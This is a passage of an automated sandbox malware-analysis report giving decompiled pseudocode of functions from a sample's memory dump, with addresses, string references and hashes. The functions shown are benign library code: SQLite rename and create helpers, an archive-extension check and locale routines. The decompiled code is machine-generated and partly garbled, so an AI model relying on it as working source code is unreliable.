									if( *((intOrPtr*)(_t148 + 0x18)) != _t65) {
										goto L21;
									} else {
										_push(_t65);
										_push( *_t148);
										_push(_v12);
										_t134 = 0x1a;
										_t66 = E00848241(_t88, _t134);
										_t155 = _t154 + 0xc;
										if(_t66 == 0) {
											_t67 = L00849C0E(_t88, _t148);
											if(_t67 == 0) {
												if( *((intOrPtr*)(_t148 + 0x39)) != _t67) {
													_t125 =  !=  ? 1 : _v16;
													_v16 =  !=  ? 1 : _v16;
												}
												_t68 = E0084E1A1(_t88, 1);
												_v24 = _t68;
												_t172 = _t68;
												if(_t68 != 0) {
													E0084B437(_t88, _v16, _t172, _v28);
													_t139 = _v28;
													E00849478(_t88, _v28, _t172);
													if(_v16 != 0) {
														 *((intOrPtr*)(_t88 + 0x48)) =  *((intOrPtr*)(_t88 + 0x48)) + 1;
														_t149 =  *((intOrPtr*)(_t88 + 0x48));
														_push(0);
														_push(_t149);
														_push(0);
														_t144 = 0x58;
														E0083D120(_v24, L0083CD8E(_v24, _t144), _t150, 0);
														_push(0);
														_push(0);
														_push(_t149);
														_t146 = 0x1c;
														_t83 = L0083CD8E(_v24, _t146);
														_t155 = _t155 + 0x20;
														_t139 = _t83;
														E0083D120(_v24, _t83,  *((intOrPtr*)(_v32 + 0x40)), 0xfffffff6);
														_t150 = _v36;
														_t148 = _v32;
													}
													_t71 = E008320C4( *_t148, _t139 | 0xffffffff);
													_push( *_t148);
													_push(_t71);
													_push(_t150);
													_push(_t150);
													_push(_t150);
													_push(_t150);
													_push(_t150);
													_t73 =  ==  ? "sqlite_temp_master" : "sqlite_master";
													_push( ==  ? "sqlite_temp_master" : "sqlite_master");
													E00848597(_t88, "UPDATE %Q.%s SET sql = CASE WHEN type = \'trigger\' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type=\'table\' THEN %Q WHEN name LIKE \'sqlite_autoindex%%\' AND type=\'index\' THEN \'sqlite_autoindex_\' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type=\'table\' OR type=\'index\' OR type=\'trigger\');", _v12);
													_t156 = _t155 + 0x2c;
													if(E00848615("sqlite_sequence", _v12) != 0) {
														_push( *_t148);
														_push(_t150);
														E00848597(_t88, "UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q", _v12);
														_t156 = _t156 + 0x14;
													}
													_t76 = L00846EF8(_t88, _t148);
													_v36 = _t76;
													_t177 = _t76;
													if(_t76 != 0) {
														_push(_t76);
														_push(_t150);
														E00848597(_t88, "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;", _t150);
														E008306DB(_v36);
													}
													L00846F67(_t88, _t148, _t177, _t150);
													L22:
												}
											}
										}
									}
								}
							}
						}
					}
					_t128 = _v8;
				}
				E0084B116(_t128);
				return E008306DB(_t150);
			}






























                                    0x0084706c
                                    0x00847073
                                    0x00847075
                                    0x00847079
                                    0x0084707b
                                    0x0084707e
                                    0x00847081
                                    0x00847084
                                    0x00847088
                                    0x0084709b
                                    0x0084709d
                                    0x008470a4
                                    0x008470af
                                    0x008470bd
                                    0x008470c8
                                    0x008470d0
                                    0x008470d2
                                    0x008470d7
                                    0x008470ed
                                    0x008472a5
                                    0x008472a5
                                    0x008472aa
                                    0x008472ab
                                    0x00000000
                                    0x0084712d
                                    0x00847131
                                    0x00847138
                                    0x00847141
                                    0x00000000
                                    0x00847147
                                    0x00847147
                                    0x00847148
                                    0x0084714c
                                    0x00847151
                                    0x00847152
                                    0x00847157
                                    0x0084715c
                                    0x00847166
                                    0x0084716d
                                    0x00847179
                                    0x00847187
                                    0x0084718a
                                    0x0084718a
                                    0x0084718f
                                    0x00847194
                                    0x00847197
                                    0x00847199
                                    0x008471a7
                                    0x008471ac
                                    0x008471b2
                                    0x008471bb
                                    0x008471bd
                                    0x008471c0
                                    0x008471c6
                                    0x008471c8
                                    0x008471c9
                                    0x008471cd
                                    0x008471de
                                    0x008471e9
                                    0x008471eb
                                    0x008471f0
                                    0x008471f3
                                    0x008471f4
                                    0x008471fc
                                    0x008471ff
                                    0x00847204
                                    0x00847209
                                    0x0084720c
                                    0x00847210
                                    0x00847216
                                    0x0084721b
                                    0x00847226
                                    0x00847227
                                    0x00847228
                                    0x00847229
                                    0x0084722a
                                    0x0084722b
                                    0x00847231
                                    0x00847234
                                    0x0084723e
                                    0x00847246
                                    0x00847259
                                    0x0084725b
                                    0x0084725d
                                    0x00847267
                                    0x0084726c
                                    0x0084726c
                                    0x00847273
                                    0x00847278
                                    0x0084727b
                                    0x0084727d
                                    0x0084727f
                                    0x00847280
                                    0x00847288
                                    0x00847293
                                    0x00847298
                                    0x0084729e
                                    0x008472b1
                                    0x008472b1
                                    0x00847199
                                    0x0084716d
                                    0x0084715c
                                    0x00847141
                                    0x00847138
                                    0x008470ed
                                    0x008470d7
                                    0x008472b2
                                    0x008472b2
                                    0x008472b7
                                    0x008472c7

                                    APIs
                                      • Part of subcall function 00848615: _strlen.LIBCMT ref: 0084865A
                                      • Part of subcall function 008486CA: _strlen.LIBCMT ref: 0084871F
                                    • _strlen.LIBCMT ref: 0084710B
                                    Strings
                                    • sqlite_, xrefs: 00847118
                                    • sqlite_sequence, xrefs: 00847249
                                    • UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q, xrefs: 00847238
                                    • sqlite_master, xrefs: 0084722C, 00847234
                                    • UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;, xrefs: 00847282
                                    • sqlite_temp_master, xrefs: 00847221
                                    • UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q, xrefs: 00847261
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q$UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q$UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;$sqlite_$sqlite_master$sqlite_sequence$sqlite_temp_master
                                    • API String ID: 4218353326-1520438555
                                    • Opcode ID: d85978f5e5e2c73730760c96ee0e6511eb312e073b6a2c89fabf979f6bbfd361
                                    • Instruction ID: 5038ed7ed4fda1eac94e835f02b814e9bf85e77e8c8aa24ad5a36b225bdbaffb
                                    • Opcode Fuzzy Hash: d85978f5e5e2c73730760c96ee0e6511eb312e073b6a2c89fabf979f6bbfd361
                                    • Instruction Fuzzy Hash: E4619231B04219ABDF14AB69CC41A6EB7B6FF89310F104029F901EB386EF759D51CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00849581 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 154COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 56%
                                    			E00849581(char __ecx, intOrPtr* __edx, void* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t54;
				intOrPtr _t68;
				intOrPtr _t75;
				void* _t79;
				void* _t88;
				intOrPtr _t93;
				intOrPtr* _t95;
				void* _t96;
				intOrPtr _t112;
				intOrPtr* _t118;
				char _t119;
				intOrPtr _t120;
				intOrPtr* _t123;
				intOrPtr* _t126;
				void* _t128;
				void* _t130;
				void* _t131;

				_t115 = __edx;
				_t118 = __edx;
				_v8 = __ecx;
				_v24 = __edx;
				_v20 = 0;
				_t123 = 0;
				_v16 = 0;
				_t95 =  *((intOrPtr*)(__edx + 8));
				if( *((intOrPtr*)(__edx + 4)) <= 0) {
					L4:
					_t54 = E008494CB( *_t118);
					_t56 =  <  ? ")" : "\n)";
					_v36 =  <  ? ")" : "\n)";
					_t58 =  <  ? "," : ",\n  ";
					_v28 =  <  ? "," : ",\n  ";
					_v12 = 0x23 +  *(_t118 + 4) * 6 + _t123 + _t54;
					_t96 = E00830614(_t115, 0x23 +  *(_t118 + 4) * 6 + _t123 + _t54);
					if(_t96 != 0) {
						_t64 =  !=  ? "CREATE TEMP TABLE " : "CREATE TABLE ";
						_push( !=  ? "CREATE TEMP TABLE " : "CREATE TABLE ");
						_push(_t96);
						_push(_v12);
						E00831AA8();
						_t131 = _t130 + 0xc;
						_v8 = E00873BA0(_t96);
						E008494E8(_t96,  &_v8,  *_t118);
						_t119 = _v8;
						_t68 = _v24;
						 *((char*)(_t119 + _t96)) = 0x28;
						_t120 = _t119 + 1;
						_v16 =  *((intOrPtr*)(_t68 + 8));
						if( *((intOrPtr*)(_t68 + 4)) <= 0) {
							L12:
							E00831AA8(_v12 - _t120, _t120 + _t96, "%s", _v36);
							return _t96;
						}
						_t75 =  <  ? 0x8a43ab : "\n  ";
						do {
							_push(_t75);
							_push(_t120 + _t96);
							_push(_v12 - _t120);
							E00831AA8();
							_t131 = _t131 + 0xc;
							_t79 = E00873BA0(_t120 + _t96);
							_t126 = _v16;
							_v8 = _t120 + _t79;
							_v32 = _v28;
							E008494E8(_t96,  &_v8,  *_t126);
							_t122 =  *((intOrPtr*)(_t126 + 8));
							if( *((intOrPtr*)(_t126 + 8)) == 0) {
								_t120 = _v8;
							} else {
								_t37 = _v8 + 1; // 0x1
								_t128 = _t37;
								 *((char*)(_v8 + _t96)) = 0x20;
								E00831AA8(_v12 - _t128, _t128 + _t96, "%s", _t122);
								_t88 = E00873BA0(_t122);
								_t131 = _t131 + 0x14;
								_t120 = _t128 + _t88;
								_t126 = _v16;
							}
							_t112 = _v20 + 1;
							_v16 = _t126 + 0x14;
							_v20 = _t112;
							_t75 = _v32;
						} while (_t112 <  *((intOrPtr*)(_v24 + 4)));
						goto L12;
					}
					 *((char*)(_v8 + 0x1e)) = 1;
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					_t123 = _t123 + E008494CB( *_t95);
					if( *((intOrPtr*)(_t95 + 8)) != 0) {
						_t123 = _t123 + 1 + E00873BA0( *((intOrPtr*)(_t95 + 8)));
					}
					_t95 = _t95 + 0x14;
					_t93 = _v16 + 1;
					_v16 = _t93;
				} while (_t93 <  *(_t118 + 4));
				goto L4;
			}




























                                    0x00849581
                                    0x0084958a
                                    0x0084958c
                                    0x00849591
                                    0x00849594
                                    0x00849597
                                    0x00849599
                                    0x0084959c
                                    0x008495a2
                                    0x008495ce
                                    0x008495d0
                                    0x008495e4
                                    0x008495ec
                                    0x008495f4
                                    0x008495f7
                                    0x00849604
                                    0x0084960c
                                    0x00849611
                                    0x0084962f
                                    0x00849632
                                    0x00849633
                                    0x00849634
                                    0x00849637
                                    0x0084963c
                                    0x0084964b
                                    0x00849650
                                    0x00849655
                                    0x00849658
                                    0x0084965c
                                    0x00849660
                                    0x00849668
                                    0x0084966b
                                    0x0084970c
                                    0x0084971e
                                    0x00000000
                                    0x00849726
                                    0x0084967e
                                    0x00849681
                                    0x00849681
                                    0x0084968a
                                    0x0084968b
                                    0x0084968c
                                    0x00849691
                                    0x00849695
                                    0x0084969a
                                    0x008496aa
                                    0x008496ad
                                    0x008496b0
                                    0x008496b5
                                    0x008496bb
                                    0x008496ed
                                    0x008496bd
                                    0x008496c6
                                    0x008496c6
                                    0x008496c9
                                    0x008496d7
                                    0x008496dd
                                    0x008496e2
                                    0x008496e5
                                    0x008496e8
                                    0x008496e8
                                    0x008496f9
                                    0x008496fa
                                    0x008496fd
                                    0x00849703
                                    0x00849703
                                    0x00000000
                                    0x00849681
                                    0x00849616
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008495a4
                                    0x008495a4
                                    0x008495ab
                                    0x008495b1
                                    0x008495bd
                                    0x008495bd
                                    0x008495c2
                                    0x008495c5
                                    0x008495c6
                                    0x008495c9
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: $, $CREATE TABLE $CREATE TEMP TABLE
                                    • API String ID: 4218353326-108156782
                                    • Opcode ID: f4b9e67beae32687472dcfb0946771f606e27320b57d4c4a77ca9dd411061bbd
                                    • Instruction ID: 6e3a9d583823e587e75d0e3b5ccd924b624d9738da7e082c4f87127eb3db769a
                                    • Opcode Fuzzy Hash: f4b9e67beae32687472dcfb0946771f606e27320b57d4c4a77ca9dd411061bbd
                                    • Instruction Fuzzy Hash: 86514A71E00219EFDF14DFACC885A9EBBF4FB89310B154469E849E7201EB34AE05CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081740E Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 78COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0081740E(void* __ecx, void* __eflags) {
				void* _t31;
				char* _t32;
				void* _t34;

				_t31 = __ecx;
				_t32 = _t31 + E00873BA0(__ecx);
				while(1) {
					_t34 = _t32 - _t31;
					if(_t34 <= 0) {
						break;
					}
					if( *_t32 == 0x2e) {
						L6:
						if(L00875DA2(_t32, ".Z") == 0 || L00875DA2(_t32, ".zip") == 0 || L00875DA2(_t32, ".zoo") == 0 || L00875DA2(_t32, ".arc") == 0 || L00875DA2(_t32, ".lzh") == 0 || L00875DA2(_t32, ".arj") == 0 || L00875DA2(_t32, ".gz") == 0 || L00875DA2(_t32, ".tgz") == 0) {
							return 1;
						} else {
							L14:
							return 0;
						}
					}
					_t32 = _t32 - 1;
				}
				if(_t34 != 0 ||  *_t32 == 0x2e) {
					goto L6;
				} else {
					goto L14;
				}
			}






                                    0x00817410
                                    0x00817419
                                    0x00817424
                                    0x00817424
                                    0x00817426
                                    0x00000000
                                    0x00000000
                                    0x00817421
                                    0x00817433
                                    0x00817442
                                    0x00000000
                                    0x008174bb
                                    0x008174bb
                                    0x00000000
                                    0x008174bb
                                    0x00817442
                                    0x00817423
                                    0x00817423
                                    0x00817428
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                    • API String ID: 4218353326-51310709
                                    • Opcode ID: 48b892863f1af2a195605a7638239947d1d00347ea96e6cfcc96baaba79df91c
                                    • Instruction ID: 9eeca43c70f74cd724eb80c52c456e8b6542981d841318851dc82f5a5d1dd534
                                    • Opcode Fuzzy Hash: 48b892863f1af2a195605a7638239947d1d00347ea96e6cfcc96baaba79df91c
                                    • Instruction Fuzzy Hash: AE11162610DF22287765212E6C566E71E9CFD53730724802EEA18E55C5EE8EDDC1607E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00862731 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E00862731(intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr _t37;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr _t50;
				signed int _t51;
				signed int _t56;
				void* _t59;
				void* _t63;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t76;

				_t76 = __eflags;
				_t59 = __edx;
				_t50 = __ecx;
				_push(0x64);
				E0086E2F3(0x894d1a, __edi, __esi);
				_t49 = _t50;
				 *((intOrPtr*)(_t69 - 0x6c)) = E0087AAF8(_t59);
				_t32 = L0085AC0D(_t59, _t76, _t69 - 0x68);
				_t51 = 0xb;
				_t67 = _t32;
				 *((intOrPtr*)(_t69 - 0x70)) = _t49;
				memcpy(_t69 - 0x3c, _t67, _t51 << 2);
				_t71 = _t70 + 0xc;
				_t63 = _t67 + _t51 + _t51;
				_t68 = 0;
				 *((intOrPtr*)(_t49 + 8)) = 0;
				 *((intOrPtr*)(_t49 + 0x10)) = 0;
				 *((intOrPtr*)(_t49 + 0x14)) = 0;
				 *((intOrPtr*)(_t69 - 4)) = 0;
				L0085AC0D(_t59, _t76, _t69 - 0x68);
				if( *((char*)(_t69 + 0xc)) == 0) {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t69 - 0x6c)) + 8));
				} else {
					_t37 = 0x8a43ab;
				}
				_push(_t69 - 0x68);
				_push(_t68);
				 *((intOrPtr*)(_t49 + 8)) = L00856D62(_t37);
				 *((intOrPtr*)(_t49 + 0x10)) = E0085B848(_t49, _t63, _t68, "false", _t68, _t69 - 0x3c);
				_t42 = E0085B848(_t49, _t63, _t68, "true", _t68, _t69 - 0x3c);
				_t72 = _t71 + 0x24;
				 *((intOrPtr*)(_t49 + 0x14)) = _t42;
				if( *((char*)(_t69 + 0xc)) == 0) {
					_t68 = _t69 - 0x3c;
					_t56 = 0xb;
					_push( *((intOrPtr*)(_t69 - 0x6c)));
					memcpy(_t72 - 0x2c, _t68, _t56 << 2);
					_t63 = _t68 + _t56 + _t56;
					_push(0);
					_t44 = E0085B678(_t49, __eflags);
				} else {
					 *((short*)(_t49 + 0xc)) = E0085B817(0x2e, _t68, _t69 - 0x3c);
					 *((short*)(_t49 + 0xe)) = E0085B817(0x2c, _t68, _t69 - 0x3c);
				}
				return E0086E2AE(_t44, _t63, _t68);
			}



















                                    0x00862731
                                    0x00862731
                                    0x00862731
                                    0x00862731
                                    0x00862738
                                    0x0086273d
                                    0x00862744
                                    0x0086274b
                                    0x00862752
                                    0x00862753
                                    0x00862755
                                    0x0086275b
                                    0x0086275b
                                    0x0086275b
                                    0x0086275d
                                    0x0086275f
                                    0x00862762
                                    0x00862765
                                    0x0086276b
                                    0x0086276f
                                    0x0086277a
                                    0x00862786
                                    0x0086277c
                                    0x0086277c
                                    0x0086277c
                                    0x0086278c
                                    0x0086278d
                                    0x00862794
                                    0x008627a6
                                    0x008627b3
                                    0x008627b8
                                    0x008627bb
                                    0x008627c2
                                    0x008627ec
                                    0x008627f1
                                    0x008627f4
                                    0x008627f7
                                    0x008627f7
                                    0x008627f9
                                    0x008627fd
                                    0x008627c4
                                    0x008627d0
                                    0x008627e3
                                    0x008627e3
                                    0x00862807

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 00862738
                                    • _Maklocstr.LIBCPMT ref: 008627A1
                                    • _Maklocstr.LIBCPMT ref: 008627B3
                                    • _Maklocchr.LIBCPMT ref: 008627CB
                                    • _Maklocchr.LIBCPMT ref: 008627DB
                                    • _Getvals.LIBCPMT ref: 008627FD
                                      • Part of subcall function 0085B678: _Maklocchr.LIBCPMT ref: 0085B6A7
                                      • Part of subcall function 0085B678: _Maklocchr.LIBCPMT ref: 0085B6BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                    • String ID: false$true
                                    • API String ID: 3549167292-2658103896
                                    • Opcode ID: 2896f3cd0d5188a1dac457ce97f5546ea7006b03ac2b8811ebfaa1ad8fc2a3ce
                                    • Instruction ID: 565cf85019e9e2357a2004313d97a6af106f2a08309e4d893f06c94be8fb525d
                                    • Opcode Fuzzy Hash: 2896f3cd0d5188a1dac457ce97f5546ea7006b03ac2b8811ebfaa1ad8fc2a3ce
                                    • Instruction Fuzzy Hash: 582183B5D00314AADF14EFA8D886EDE7B68FF05750F008056F905DF242DBB09944CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088973A Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 79%
                                    			E0088973A(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t59;
				signed int _t68;
				signed int _t70;
				signed int _t73;
				signed int _t76;
				char _t81;
				intOrPtr* _t82;
				void* _t93;
				void* _t94;
				signed int _t97;
				void* _t100;
				char _t108;
				char _t109;
				void* _t114;
				char* _t115;
				signed int _t121;
				signed int* _t122;
				char _t124;
				intOrPtr* _t126;
				char* _t131;

				_t114 = __edx;
				_t124 = _a4;
				_v24 = _t124;
				_v20 = 0;
				if( *((intOrPtr*)(_t124 + 0xb0)) != 0 ||  *((intOrPtr*)(_t124 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E008800C6(_t94, 1, 0x50);
					if(_t93 != 0) {
						_t97 = 0x14;
						memcpy(_t93,  *(_t124 + 0x88), _t97 << 2);
						_t126 = E0088255C(0, 4);
						_t121 = 0;
						_v8 = _t126;
						E00880123(0);
						_pop(_t100);
						if(_t126 != 0) {
							 *_t126 = 0;
							_t124 = _a4;
							if( *((intOrPtr*)(_t124 + 0xb0)) == 0) {
								_t52 =  *0x8b2060; // 0x8b20b4
								 *_t93 = _t52;
								_t53 =  *0x8b2064; // 0x8b4274
								 *((intOrPtr*)(_t93 + 4)) = _t53;
								_t54 =  *0x8b2068; // 0x8b4274
								 *((intOrPtr*)(_t93 + 8)) = _t54;
								_t55 =  *0x8b2090; // 0x8b20b8
								 *((intOrPtr*)(_t93 + 0x30)) = _t55;
								_t56 =  *0x8b2094; // 0x8b4278
								 *((intOrPtr*)(_t93 + 0x34)) = _t56;
								L19:
								 *_v8 = 1;
								if(_t121 != 0) {
									 *_t121 = 1;
								}
								goto L21;
							}
							_t122 = E0088255C(_t100, 4);
							_v12 = _t122;
							E00880123(0);
							_push(_t93);
							if(_t122 != 0) {
								 *_t122 =  *_t122 & 0x00000000;
								_t123 =  *((intOrPtr*)(_t124 + 0xb0));
								_t68 = L00884D02(_t114);
								_t16 = _t93 + 4; // 0x4
								_t70 = L00884D02(_t114,  &_v24, 1,  *((intOrPtr*)(_t124 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t73 = L00884D02(_t114,  &_v24, 1,  *((intOrPtr*)(_t124 + 0xb0)), 0x10, _t18, 1);
								_t76 = L00884D02(_t114,  &_v24, 2,  *((intOrPtr*)(_t124 + 0xb0)), 0xe, _t93 + 0x30, _t123);
								_t22 = _t93 + 0x34; // 0x34
								if((L00884D02(_t114,  &_v24, 2, _t123, 0xf, _t22, 0xe) | _t68 | _t70 | _t73 | _t76) == 0) {
									_t115 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t81 =  *_t115;
										if(_t81 == 0) {
											break;
										}
										_t30 = _t81 - 0x30; // -48
										_t108 = _t30;
										if(_t108 > 9) {
											if(_t81 != 0x3b) {
												L16:
												_t115 = _t115 + 1;
												continue;
											}
											_t131 = _t115;
											do {
												_t82 = _t131 + 1;
												_t109 =  *_t82;
												 *_t131 = _t109;
												_t131 = _t82;
											} while (_t109 != 0);
											continue;
										}
										 *_t115 = _t108;
										goto L16;
									}
									_t121 = _v12;
									_t124 = _a4;
									goto L19;
								}
								E008896D1(_t93);
								E00880123(_t93);
								E00880123(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E00880123(_v8);
								return _v16;
							}
							E00880123();
							goto L12;
						}
						E00880123(_t93);
						return 1;
					}
					return 1;
				} else {
					_t121 = 0;
					_v8 = 0;
					_t93 = 0x8b2060;
					L21:
					_t59 =  *(_t124 + 0x80);
					if(_t59 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t124 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t59 | 0xffffffff) == 0) {
							E00880123( *((intOrPtr*)(_t124 + 0x7c)));
							E00880123( *(_t124 + 0x88));
						}
					}
					 *((intOrPtr*)(_t124 + 0x7c)) = _v8;
					 *(_t124 + 0x80) = _t121;
					 *(_t124 + 0x88) = _t93;
					return 0;
				}
			}

































                                    0x0088973a
                                    0x00889744
                                    0x0088974a
                                    0x0088974d
                                    0x00889756
                                    0x00889775
                                    0x0088977d
                                    0x00889783
                                    0x00889796
                                    0x00889797
                                    0x008897a0
                                    0x008897a2
                                    0x008897a5
                                    0x008897a8
                                    0x008897ae
                                    0x008897b1
                                    0x008897c2
                                    0x008897c4
                                    0x008897cd
                                    0x0088991d
                                    0x00889922
                                    0x00889924
                                    0x00889929
                                    0x0088992c
                                    0x00889931
                                    0x00889934
                                    0x00889939
                                    0x0088993c
                                    0x00889941
                                    0x008898af
                                    0x008898b5
                                    0x008898b9
                                    0x008898bb
                                    0x008898bb
                                    0x00000000
                                    0x008898b9
                                    0x008897da
                                    0x008897de
                                    0x008897e1
                                    0x008897e8
                                    0x008897eb
                                    0x008897f8
                                    0x008897fe
                                    0x0088980a
                                    0x0088980f
                                    0x0088981e
                                    0x00889825
                                    0x00889832
                                    0x00889846
                                    0x00889850
                                    0x00889867
                                    0x00889893
                                    0x008898a3
                                    0x008898a3
                                    0x008898a7
                                    0x00000000
                                    0x00000000
                                    0x00889898
                                    0x00889898
                                    0x0088989e
                                    0x0088990a
                                    0x008898a2
                                    0x008898a2
                                    0x00000000
                                    0x008898a2
                                    0x0088990c
                                    0x0088990e
                                    0x0088990e
                                    0x00889911
                                    0x00889913
                                    0x00889915
                                    0x00889917
                                    0x00000000
                                    0x0088991b
                                    0x008898a0
                                    0x00000000
                                    0x008898a0
                                    0x008898a9
                                    0x008898ac
                                    0x00000000
                                    0x008898ac
                                    0x0088986a
                                    0x00889870
                                    0x00889878
                                    0x00889880
                                    0x00889884
                                    0x00889888
                                    0x00000000
                                    0x00889890
                                    0x008897ed
                                    0x00000000
                                    0x008897f2
                                    0x008897b4
                                    0x00000000
                                    0x008897bc
                                    0x00000000
                                    0x00889760
                                    0x00889760
                                    0x00889762
                                    0x00889765
                                    0x008898bd
                                    0x008898bd
                                    0x008898c5
                                    0x008898c7
                                    0x008898c7
                                    0x008898cf
                                    0x008898d4
                                    0x008898d8
                                    0x008898dd
                                    0x008898e8
                                    0x008898ee
                                    0x008898d8
                                    0x008898f2
                                    0x008898f7
                                    0x008898fd
                                    0x00000000
                                    0x008898fd

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
